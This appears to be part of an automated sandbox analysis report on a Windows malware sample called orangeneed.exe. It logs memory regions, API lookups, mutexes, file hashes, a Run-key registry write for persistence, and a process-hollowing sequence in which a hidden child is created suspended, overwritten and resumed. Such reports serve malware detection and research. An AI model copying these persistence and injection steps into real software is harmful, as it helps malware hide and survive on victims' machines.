pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Host Behavior

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe	os_pid = 0x9dc, creation_flags = CREATE_HIGH_PRIORITY_CLASS, show_window = SW_HIDE		1	Fn

Module (263)

Operation	Module	Additional Information	Count	Logfile
Load	USER32.dll	base_address = 0x76dc0000	1	Fn
Load	KERNEL32.dll	base_address = 0x75730000	1	Fn
Get Handle	c:\users\public\428.exe	base_address = 0x400000	1	Fn
Get Filename	-	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe, size = 260	1	Fn
Get Address	-	function = VirtualAlloc, ordinal = 0, address_out = 0x18f8ec	249	Fn
Get Address	-	function = LoadLibraryA, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	-	function = GetProcAddress, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	-	function = VirtualAlloc, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	-	function = VirtualProtect, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = wsprintfA, address_out = 0x76deae5f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeConsole, address_out = 0x757e6aa8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpA, address_out = 0x7575eceb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x757411c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x757411a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x75741809	1	Fn

Mutex (2)

Operation	Additional Information	Success	Count	Logfile
Create	mutex_name = PEM8D0		1	Fn
Create	mutex_name = PEM9CC		1	Fn

Process #7: orangeneed.exe

572

Information	Value
ID	#7
File Name	c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe
Command Line	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe"
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:02:04, Reason: Child Process
Unmonitor	End Time: 00:03:12, Reason: Self Terminated
Monitor Duration	00:01:08

OS Process Information

Information	Value
PID	0x9dc
Parent PID	0x9cc (c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 924 0x 9E4 0x 140 0x 90 0x 6B8 0x 794 0x 78C 0x 310 0x B0C 0x B18 0x B2C 0x B24 0x 700

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001a0000	0x001a0000	0x001a1fff	Pagefile Backed Memory	r	-
locale.nls	0x001b0000	0x00216fff	Memory Mapped File	r	-
private_0x0000000000220000	0x00220000	0x002dffff	Private Memory	rw	-
pagefile_0x00000000002e0000	0x002e0000	0x002e6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000002f0000	0x002f0000	0x002f1fff	Pagefile Backed Memory	rw	-
msvfw32.dll.mui	0x00300000	0x00301fff	Memory Mapped File	rw	-
pagefile_0x0000000000310000	0x00310000	0x00311fff	Pagefile Backed Memory	r	-
private_0x0000000000320000	0x00320000	0x00335fff	Private Memory	rw	-
private_0x0000000000340000	0x00340000	0x0034ffff	Private Memory	rwx	-
private_0x0000000000350000	0x00350000	0x0035ffff	Private Memory	rw	-
private_0x0000000000360000	0x00360000	0x00376fff	Private Memory	rwx	-
private_0x0000000000380000	0x00380000	0x003fffff	Private Memory	rw	-
428.exe	0x00400000	0x0045dfff	Memory Mapped File	rwx	-
pagefile_0x0000000000460000	0x00460000	0x005e7fff	Pagefile Backed Memory	r	-
private_0x00000000005f0000	0x005f0000	0x00606fff	Private Memory	rw	-
private_0x0000000000610000	0x00610000	0x0061ffff	Private Memory	rw	-
private_0x0000000000620000	0x00620000	0x0062ffff	Private Memory	rw	-
pagefile_0x0000000000620000	0x00620000	0x00627fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000620000	0x00620000	0x00620fff	Pagefile Backed Memory	rw	-
private_0x0000000000630000	0x00630000	0x0072ffff	Private Memory	rw	-
pagefile_0x0000000000730000	0x00730000	0x008b0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000008c0000	0x008c0000	0x01cbffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001cc0000	0x01cc0000	0x020b2fff	Pagefile Backed Memory	r	-
private_0x00000000020c0000	0x020c0000	0x021bffff	Private Memory	rw	-
sortdefault.nls	0x021c0000	0x0248efff	Memory Mapped File	r	-
pagefile_0x0000000002490000	0x02490000	0x02497fff	Pagefile Backed Memory	rw	-
private_0x0000000002490000	0x02490000	0x0264ffff	Private Memory	rw	-
pagefile_0x0000000002490000	0x02490000	0x0256efff	Pagefile Backed Memory	r	-
private_0x0000000002570000	0x02570000	0x025affff	Private Memory	rw	-
pagefile_0x00000000025b0000	0x025b0000	0x0260bfff	Pagefile Backed Memory	r	-
rsaenh.dll	0x025b0000	0x025ebfff	Memory Mapped File	r	-
private_0x00000000025b0000	0x025b0000	0x025bffff	Private Memory	rw	-
pagefile_0x00000000025b0000	0x025b0000	0x025b7fff	Pagefile Backed Memory	rw	-
pagefile_0x00000000025b0000	0x025b0000	0x025b1fff	Pagefile Backed Memory	r	-
pagefile_0x00000000025c0000	0x025c0000	0x025c7fff	Pagefile Backed Memory	rw	-
index.dat	0x025c0000	0x025cbfff	Memory Mapped File	rw	-
index.dat	0x025d0000	0x025d7fff	Memory Mapped File	rw	-
index.dat	0x025e0000	0x025effff	Memory Mapped File	rw	-
private_0x00000000025f0000	0x025f0000	0x025f0fff	Private Memory	rw	-
pagefile_0x00000000025f0000	0x025f0000	0x025f0fff	Pagefile Backed Memory	r	-
pagefile_0x0000000002600000	0x02600000	0x02600fff	Pagefile Backed Memory	r	-
private_0x0000000002610000	0x02610000	0x0264ffff	Private Memory	rw	-
private_0x0000000002650000	0x02650000	0x0274ffff	Private Memory	rw	-
private_0x0000000002750000	0x02750000	0x0293ffff	Private Memory	rw	-
private_0x0000000002750000	0x02750000	0x0278ffff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x0288ffff	Private Memory	rw	-
private_0x0000000002890000	0x02890000	0x028cffff	Private Memory	rw	-
pagefile_0x00000000028d0000	0x028d0000	0x028d0fff	Pagefile Backed Memory	r	-
private_0x0000000002900000	0x02900000	0x0293ffff	Private Memory	rw	-
private_0x0000000002940000	0x02940000	0x02a3ffff	Private Memory	rw	-
private_0x0000000002a40000	0x02a40000	0x02a7ffff	Private Memory	rw	-
private_0x0000000002a80000	0x02a80000	0x02b7ffff	Private Memory	rw	-
private_0x0000000002b80000	0x02b80000	0x02caffff	Private Memory	rw	-
private_0x0000000002b80000	0x02b80000	0x02c3ffff	Private Memory	rw	-
private_0x0000000002b80000	0x02b80000	0x02bcffff	Private Memory	rw	-
private_0x0000000002b80000	0x02b80000	0x02bbffff	Private Memory	rw	-
private_0x0000000002c30000	0x02c30000	0x02c3ffff	Private Memory	rw	-
private_0x0000000002ca0000	0x02ca0000	0x02caffff	Private Memory	rw	-
private_0x0000000002cb0000	0x02cb0000	0x02daffff	Private Memory	rw	-
dnsapi.dll	0x74380000	0x743c3fff	Memory Mapped File	rwx	-
comctl32.dll	0x743d0000	0x7456dfff	Memory Mapped File	rwx	-
rasadhlp.dll	0x747a0000	0x747a5fff	Memory Mapped File	rwx	-
nlaapi.dll	0x747b0000	0x747bffff	Memory Mapped File	rwx	-
sensapi.dll	0x747c0000	0x747c5fff	Memory Mapped File	rwx	-
winnsi.dll	0x747d0000	0x747d6fff	Memory Mapped File	rwx	-
rsaenh.dll	0x747e0000	0x7481afff	Memory Mapped File	rwx	-
esent.dll	0x74820000	0x749c2fff	Memory Mapped File	rwx	-
dwmapi.dll	0x74a10000	0x74a22fff	Memory Mapped File	rwx	-
uxtheme.dll	0x74a30000	0x74aaffff	Memory Mapped File	rwx	-
wow64cpu.dll	0x74ac0000	0x74ac7fff	Memory Mapped File	rwx	-
wow64win.dll	0x74ad0000	0x74b2bfff	Memory Mapped File	rwx	-
wow64.dll	0x74b30000	0x74b6efff	Memory Mapped File	rwx	-
iphlpapi.dll	0x74b70000	0x74b8bfff	Memory Mapped File	rwx	-
rtutils.dll	0x74b90000	0x74b9cfff	Memory Mapped File	rwx	-
cryptsp.dll	0x74ba0000	0x74bb5fff	Memory Mapped File	rwx	-
wtsapi32.dll	0x74bc0000	0x74bccfff	Memory Mapped File	rwx	-
profapi.dll	0x74bd0000	0x74bdafff	Memory Mapped File	rwx	-
userenv.dll	0x74be0000	0x74bf6fff	Memory Mapped File	rwx	-
rasman.dll	0x74c00000	0x74c14fff	Memory Mapped File	rwx	-
rasapi32.dll	0x74c20000	0x74c71fff	Memory Mapped File	rwx	-
winspool.drv	0x74c80000	0x74cd0fff	Memory Mapped File	rwx	-
msvfw32.dll	0x74ce0000	0x74d00fff	Memory Mapped File	rwx	-
dciman32.dll	0x74d10000	0x74d15fff	Memory Mapped File	rwx	-
ddraw.dll	0x74d20000	0x74e06fff	Memory Mapped File	rwx	-
glu32.dll	0x74e10000	0x74e31fff	Memory Mapped File	rwx	-
opengl32.dll	0x74e40000	0x74f07fff	Memory Mapped File	rwx	-
secur32.dll	0x74f10000	0x74f17fff	Memory Mapped File	rwx	-
winmm.dll	0x74f20000	0x74f51fff	Memory Mapped File	rwx	-
msacm32.dll	0x74f60000	0x74f73fff	Memory Mapped File	rwx	-
ntdsapi.dll	0x74f80000	0x74f97fff	Memory Mapped File	rwx	-
cryptbase.dll	0x75180000	0x7518bfff	Memory Mapped File	rwx	-
sspicli.dll	0x75190000	0x751effff	Memory Mapped File	rwx	-
devobj.dll	0x751f0000	0x75201fff	Memory Mapped File	rwx	-
rpcrt4.dll	0x75210000	0x752fffff	Memory Mapped File	rwx	-
ws2_32.dll	0x75300000	0x75334fff	Memory Mapped File	rwx	-
clbcatq.dll	0x75340000	0x753c2fff	Memory Mapped File	rwx	-
gdi32.dll	0x753d0000	0x7545ffff	Memory Mapped File	rwx	-
setupapi.dll	0x75530000	0x756ccfff	Memory Mapped File	rwx	-
shlwapi.dll	0x756d0000	0x75726fff	Memory Mapped File	rwx	-
kernel32.dll	0x75730000	0x7583ffff	Memory Mapped File	rwx	-
nsi.dll	0x75840000	0x75845fff	Memory Mapped File	rwx	-
kernelbase.dll	0x75850000	0x75895fff	Memory Mapped File	rwx	-
psapi.dll	0x758a0000	0x758a4fff	Memory Mapped File	rwx	-
msasn1.dll	0x758b0000	0x758bbfff	Memory Mapped File	rwx	-
normaliz.dll	0x758c0000	0x758c2fff	Memory Mapped File	rwx	-
wininet.dll	0x758d0000	0x759c4fff	Memory Mapped File	rwx	-
advapi32.dll	0x759d0000	0x75a6ffff	Memory Mapped File	rwx	-
usp10.dll	0x75b00000	0x75b9cfff	Memory Mapped File	rwx	-
urlmon.dll	0x75ba0000	0x75cd5fff	Memory Mapped File	rwx	-
msctf.dll	0x75ce0000	0x75dabfff	Memory Mapped File	rwx	-
iertutil.dll	0x75db0000	0x75faafff	Memory Mapped File	rwx	-
ole32.dll	0x75fb0000	0x7610bfff	Memory Mapped File	rwx	-
shell32.dll	0x76110000	0x76d59fff	Memory Mapped File	rwx	-
imm32.dll	0x76d60000	0x76dbffff	Memory Mapped File	rwx	-
user32.dll	0x76dc0000	0x76ebffff	Memory Mapped File	rwx	-
sechost.dll	0x76ec0000	0x76ed8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x76ee0000	0x76f6efff	Memory Mapped File	rwx	-
cfgmgr32.dll	0x76f70000	0x76f96fff	Memory Mapped File	rwx	-
msvcrt.dll	0x76fa0000	0x7704bfff	Memory Mapped File	rwx	-
crypt32.dll	0x770e0000	0x771fcfff	Memory Mapped File	rwx	-
wintrust.dll	0x77200000	0x7722cfff	Memory Mapped File	rwx	-
private_0x0000000077230000	0x77230000	0x77329fff	Private Memory	rwx	-
private_0x0000000077330000	0x77330000	0x7744efff	Private Memory	rwx	-
ntdll.dll	0x77450000	0x775f8fff	Memory Mapped File	rwx	-
lpk.dll	0x77600000	0x77609fff	Memory Mapped File	rwx	-
ntdll.dll	0x77630000	0x777affff	Memory Mapped File	rwx	-
private_0x000000007ef47000	0x7ef47000	0x7ef49fff	Private Memory	rw	-
private_0x000000007ef4a000	0x7ef4a000	0x7ef4cfff	Private Memory	rw	-
private_0x000000007ef4d000	0x7ef4d000	0x7ef4ffff	Private Memory	rw	-
private_0x000000007ef50000	0x7ef50000	0x7efaffff	Private Memory	rw	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	rw	-
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	rw	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-
For performance reasons, the remaining 58 entries are omitted. The remaining entries can be found in flog.txt.

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp	0.11 KB	MD5: 36427ecb2a0faf13af3047c51b29f9c5 SHA1: 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f SHA256: ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345 SSDeep: 3:q8CJGEIUEF7eSAMzr+WABEImBzEWVAZGXhRAJ1zKI9:hCyUEZNiWSmBzNmeRAH9		... File Actions Show Properties Download

Modified Files

Filename	File Size	Hash Values	Actions
C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat	64.00 KB	MD5: d6f3311cb3211039ec0b3625b2c5a741 SHA1: e194fb90e0ffd980549c2c248cf594a742ca8ee8 SHA256: 0bfc0d5582b0bbf5a7401a7c2fb079feabe402628ea9fcdf2ac4f6619ea20573 SSDeep: 96:qvzEMiozzcwjQ2ubh9NdeigWEsPooLBq4Irk0kXoKH+JWMonkyoNEH+wMthKmoXb:YzV8TPmdkeJWMonGg6hI	... File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat	48.00 KB	MD5: 0d7742564c1bf905226155ddc8801d2b SHA1: 72fd26e88b22a795f79e85703fb4a6ce40a994e0 SHA256: 91425e000a3385e9c11c19ed0756d6add1f6e049de221c21c9b49873ecb278da SSDeep: 48:qHv5Jyik0i5HXWyAl7UGAnwniGhAnwwoSHXl16YSYP5lPrCoNqK5B5NA+KNi3bR/:qH7EH3WyBcaUMz3P5s+XA8dRTwLDP	... File Actions Show Properties Download
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\index.dat	32.00 KB	MD5: b25ed5680eaebd743130ba81c6fa3e7f SHA1: bdd244a2878fce8ddd7b97a1ae4ed6dc6f38bd17 SHA256: cd34c6d5341fa3554bf696d02934877f38e196bdef1d30720a53f923892b7779 SSDeep: 12:qjUXZ4OE32Y3XckQslQKy3gTLPrOLWlrOu933ekIQ3rIQbq93ILtrOLWlrOR:qjU6AXkQwQc3rOirOwekIyrIUZrOirO	... File Actions Show Properties Download

Host Behavior

File (11)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create Temp File	C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp	path = C:\Users\aETAdzjz\AppData\Local\Temp\	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp	type = size	1	Fn
Open	STD_INPUT_HANDLE	-	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Delete	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\footerdroid.exe	-	1	Fn
Delete	C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp	-	2	Fn

Registry (2)

Operation	Key	Additional Information	Success	Count	Logfile
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	-		1	Fn
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	value_name = orangeneed, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe", size = 134, type = REG_SZ		1	Fn

Process (2)

Operation	Process	Additional Information	Success	Count	Logfile
Create	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe" /scomma "C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp"	os_pid = 0x314, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE		1	Fn
Terminate	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe" /scomma "C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp"	exit_code = 0		1	Fn

Thread (3)

Operation	Process	Additional Information	Count	Logfile
Get Context	c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe	os_tid = 0xb0c	1	Fn
Set Context	c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe	os_tid = 0xb0c	1	Fn
Resume	c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe	os_tid = 0xb0c	1	Fn

Memory (5)

Operation	Process	Additional Information	Count	Logfile
Get Info	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe" /scomma "C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp"	address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096	1	Fn
Protect	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe" /scomma "C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp"	address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 372736	1	Fn
Write	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe" /scomma "C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp"	address = 0x400000, size = 372736	1	Fn Data
Write	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe" /scomma "C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp"	address = 0x7efde008, size = 4	1	Fn Data
Write	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe" /scomma "C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp"	address = 0x7efdf010, size = 4	1	Fn Data

Module (455)

Operation	Module	Additional Information	Count	Logfile
Load	USER32.dll	base_address = 0x76dc0000	1	Fn
Load	KERNEL32.dll	base_address = 0x75730000	2	Fn
Load	user32.dll	base_address = 0x76dc0000	2	Fn
Load	advapi32.dll	base_address = 0x759d0000	5	Fn
Load	shell32.dll	base_address = 0x76110000	4	Fn
Load	crypt32.dll	base_address = 0x770e0000	4	Fn
Load	urlmon.dll	base_address = 0x75ba0000	3	Fn
Load	userenv.dll	base_address = 0x74be0000	3	Fn
Load	wininet.dll	base_address = 0x758d0000	3	Fn
Load	wtsapi32.dll	base_address = 0x74bc0000	4	Fn
Load	WS2_32.dll	base_address = 0x75300000	1	Fn
Load	IPHLPAPI.DLL	base_address = 0x74b70000	1	Fn
Load	ws2_32.dll	base_address = 0x75300000	1	Fn
Load	mpr.dll	base_address = 0x74270000	2	Fn
Load	netapi32.dll	base_address = 0x74240000	2	Fn
Load	SAMCLI.DLL	base_address = 0x74210000	2	Fn
Get Handle	c:\users\public\428.exe	base_address = 0x400000	3	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75730000	1	Fn
Get Filename	-	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe, size = 260	4	Fn
Get Address	-	function = VirtualAlloc, ordinal = 0, address_out = 0x18f8ec	249	Fn
Get Address	-	function = LoadLibraryA, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	-	function = GetProcAddress, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	-	function = VirtualAlloc, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	-	function = VirtualProtect, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = wsprintfA, address_out = 0x76deae5f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeConsole, address_out = 0x757e6aa8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpA, address_out = 0x7575eceb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x757411c0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x757411a9	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x75741809	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetQueuedCompletionStatus, address_out = 0x7575d3c3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x75741136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionAndSpinCount, address_out = 0x75741916	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77652270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReleaseSemaphore, address_out = 0x7575d3ab	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x776522b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreW, address_out = 0x7575ca5a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = PostQueuedCompletionStatus, address_out = 0x7575ef29	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateIoCompletionPort, address_out = 0x7575eef2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x776645f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TryEnterCriticalSection, address_out = 0x77662500	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEvent, address_out = 0x757416c5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x7574110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ResetEvent, address_out = 0x757416dd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x7574183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThreadId, address_out = 0x75741450	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemDirectoryW, address_out = 0x75745063	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x7574492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x75742d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryPerformanceCounter, address_out = 0x75741725	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTimeAsFileTime, address_out = 0x75743509	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x757410ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x75741222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryPerformanceFrequency, address_out = 0x757441f0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x75741410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapSize, address_out = 0x77663002	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteConsoleW, address_out = 0x75767aca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x7574469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEnvironmentVariableA, address_out = 0x7574e331	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringW, address_out = 0x757417b9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringW, address_out = 0x75743bca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStringTypeW, address_out = 0x75741946	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryExW, address_out = 0x7574495d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OutputDebugStringW, address_out = 0x7576d1d4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RtlUnwind, address_out = 0x7576d1c3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeEnvironmentStringsW, address_out = 0x757451cb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentStringsW, address_out = 0x757451e3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameA, address_out = 0x757414b1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleCP, address_out = 0x757e7bff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCPInfo, address_out = 0x75745189	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetOEMCP, address_out = 0x7576d1a1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetACP, address_out = 0x7574179c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidCodePage, address_out = 0x75744493	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x75743f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x7574170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleExW, address_out = 0x75744a6f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnmapViewOfFile, address_out = 0x75741826	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointerEx, address_out = 0x7575c807	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileType, address_out = 0x75743531	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetStdHandle, address_out = 0x757c454f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x757414c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x7765e026	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77671f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x757434d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitThread, address_out = 0x7768d598	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ResumeThread, address_out = 0x757443ef	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x757411f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x75743ed3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x7574192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleMode, address_out = 0x75741328	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadConsoleW, address_out = 0x757e739a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EncodePointer, address_out = 0x77670fcb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DecodePointer, address_out = 0x77669d35	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleCtrlHandler, address_out = 0x75748a09	1	Fn
